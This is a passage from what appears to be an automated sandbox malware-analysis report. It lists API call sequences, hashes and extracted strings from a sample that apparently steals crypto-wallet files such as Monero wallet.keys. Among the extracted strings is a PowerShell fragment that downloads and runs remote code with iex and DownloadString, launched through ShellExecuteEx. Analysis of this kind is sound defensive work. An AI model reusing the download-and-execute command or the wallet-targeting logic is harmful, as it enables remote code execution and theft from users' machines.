                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: e7fb13e0c63965e94eaf219901a54352b4f87506efa8a150eb1245abe729a7d5
                                  • Instruction ID: 55ae5116c1778485161105984157f042ba2d619730a627efb8ca2e6eeffd2859
                                  • Opcode Fuzzy Hash: e7fb13e0c63965e94eaf219901a54352b4f87506efa8a150eb1245abe729a7d5
                                  • Instruction Fuzzy Hash: 98310DB4A0520DEFDB14CFA5D885BEE77B5BF48300F108158E911A7390D778AA81CFA1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: e62e1a84e1f551b960e7d541197ae80aaa5ca7e7d101e7ab7d2848895b312ce2
                                  • Instruction ID: 25453f949099c9ac2564f2bcc871e8fe8352eb4212ea4b44c20f136786e57b9b
                                  • Opcode Fuzzy Hash: e62e1a84e1f551b960e7d541197ae80aaa5ca7e7d101e7ab7d2848895b312ce2
                                  • Instruction Fuzzy Hash: 524119B110079C9EDB328B24CD95FFB7BECAB45704F1444E8DA8A97242E2759A44DF70
                                  APIs
                                  • lstrcat.KERNEL32(?,0145DD10), ref: 007F4A2B
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F4A51
                                  • lstrcat.KERNEL32(?,?), ref: 007F4A70
                                  • lstrcat.KERNEL32(?,?), ref: 007F4A84
                                  • lstrcat.KERNEL32(?,0144B1F8), ref: 007F4A97
                                  • lstrcat.KERNEL32(?,?), ref: 007F4AAB
                                  • lstrcat.KERNEL32(?,0145D738), ref: 007F4ABF
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F8F20: GetFileAttributesA.KERNEL32(00000000,?,007E1B94,?,?,0080577C,?,?,00800E22), ref: 007F8F2F
                                    • Part of subcall function 007F47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47D0
                                    • Part of subcall function 007F47C0: RtlAllocateHeap.NTDLL(00000000), ref: 007F47D7
                                    • Part of subcall function 007F47C0: wsprintfA.USER32 ref: 007F47F6
                                    • Part of subcall function 007F47C0: FindFirstFileA.KERNEL32(?,?), ref: 007F480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 94b9691ca324c925388f65a57d2fdba03e430d52266ec9620f69151fc60fde41
                                  • Instruction ID: 015e34d8a81e0fc0e9cc9e380db6de2d4a362ee7dc9a148948890f3e380389df
                                  • Opcode Fuzzy Hash: 94b9691ca324c925388f65a57d2fdba03e430d52266ec9620f69151fc60fde41
                                  • Instruction Fuzzy Hash: F63154F290020CA7DF15E7B0DC99EED733CAB48700F404689B305A6152DEB89BC9CB95
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F2FD5
                                  Strings
                                  • <, xrefs: 007F2F89
                                  • ')", xrefs: 007F2F03
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 007F2F54
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 007F2F14
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: c676bf781e0ee064279dad03140f650fcfb7071197aff2a857459c0a59e496e5
                                  • Instruction ID: 91cd54b9adb893235d4b8904eda18ed6cbd3301828718596ed8a47d88c387ee5
                                  • Opcode Fuzzy Hash: c676bf781e0ee064279dad03140f650fcfb7071197aff2a857459c0a59e496e5
                                  • Instruction Fuzzy Hash: D741EDB191020CEADB14EFA0C8A6BFDB779AF14300F404559E219B6292DF792A49CF61
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 2f5066c365603bd8a1a48e0bb4b01a8530682a471deeb5e395d15ea4ffbab9f8
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 42218E72D00758AFDB329E59CC419AF3A79FB81B96F054159FC09EB211D3348D498FA1
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 007F6C0C
                                  • sscanf.NTDLL ref: 007F6C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F6C60
                                  • ExitProcess.KERNEL32 ref: 007F6C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 507fb2448d7681e92da61c838fca8f3dba48626b915a19cff1e42f492e0e5ee2
                                  • Instruction ID: e77908995da80806038e7c916780f864179d052c8f53792a82c534cac8a130bf
                                  • Opcode Fuzzy Hash: 507fb2448d7681e92da61c838fca8f3dba48626b915a19cff1e42f492e0e5ee2
                                  • Instruction Fuzzy Hash: D621CDB5D1420CABCF04DFE4E8459EEB7B5BF48300F048529E506B3261EB749604CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,0144BB98,00000000,00020119,?), ref: 007F7FEE
                                  • RegQueryValueExA.ADVAPI32(?,0145D498,00000000,00000000,000000FF,000000FF), ref: 007F800F
                                  • RegCloseKey.ADVAPI32(?), ref: 007F8022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: e674171acf5c5d2dbd7cf933a736ac35b25b8ed54b8197c7c66f37213823a9ea
                                  • Instruction ID: 9ad4e2ffa79ec15a9cf39190b26ff73ef628d583dc94a7e41fd657762854b283
                                  • Opcode Fuzzy Hash: e674171acf5c5d2dbd7cf933a736ac35b25b8ed54b8197c7c66f37213823a9ea
                                  • Instruction Fuzzy Hash: B6118CB1A48209ABDB00CFD4DD45FBFBBB8FB44B10F104219F615A73A1DBB958018BA1
                                  APIs
                                  • StrStrA.SHLWAPI(0145DC98,00000000,00000000,?,007E9F71,00000000,0145DC98,00000000), ref: 007F93FC
                                  • lstrcpyn.KERNEL32(00AB7580,0145DC98,0145DC98,?,007E9F71,00000000,0145DC98), ref: 007F9420
                                  • lstrlen.KERNEL32(00000000,?,007E9F71,00000000,0145DC98), ref: 007F9437
                                  • wsprintfA.USER32 ref: 007F9457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 5c9ce24db1f255992cb4c0c39cc7d274408269a4e42dfd5a7064062c8cf4f239
                                  • Instruction ID: eb9aaf084db80a9cee3d339884cc93ecf0a0931f1c02783e0003c5684d0937a7
                                  • Opcode Fuzzy Hash: 5c9ce24db1f255992cb4c0c39cc7d274408269a4e42dfd5a7064062c8cf4f239
                                  • Instruction Fuzzy Hash: 22010875508108FFCB04DFA8D948AAE7B78EB88304F108348FA099B356D671AA41DBA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 007E12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: dbfae9b4d4fa0acc8adc9ceffe0f15cfc0d0a0bfc3cff9be94ed9fd8c6c34502
                                  • Instruction ID: 3f35f9074b415c87aea63090f19d96c4cf9d58869a8f37f80dff32c4d885625b
                                  • Opcode Fuzzy Hash: dbfae9b4d4fa0acc8adc9ceffe0f15cfc0d0a0bfc3cff9be94ed9fd8c6c34502
                                  • Instruction Fuzzy Hash: F1013179A44209BFDB00DFE4DC49FAE777CFB88700F004294FA05A7291DBB09A018BA0
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007F6903
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F69C6
                                  • ExitProcess.KERNEL32 ref: 007F69F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 114b30758bf158cf9656fa53ffb20192ca2197449857c084ffedda2905785c15
                                  • Instruction ID: 05b3513f0a2aabcaf811a5733a20007e38f4b7ff3ab0f3fd96dc4417544a82e3
                                  • Opcode Fuzzy Hash: 114b30758bf158cf9656fa53ffb20192ca2197449857c084ffedda2905785c15
                                  • Instruction Fuzzy Hash: 54313CF1901218EBDB15EB90DC95FEDB778AF44300F404188F309662A1DF786A48CF69
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00800E10,00000000,?), ref: 007F89BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F89C6
                                  • wsprintfA.USER32 ref: 007F89E0
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
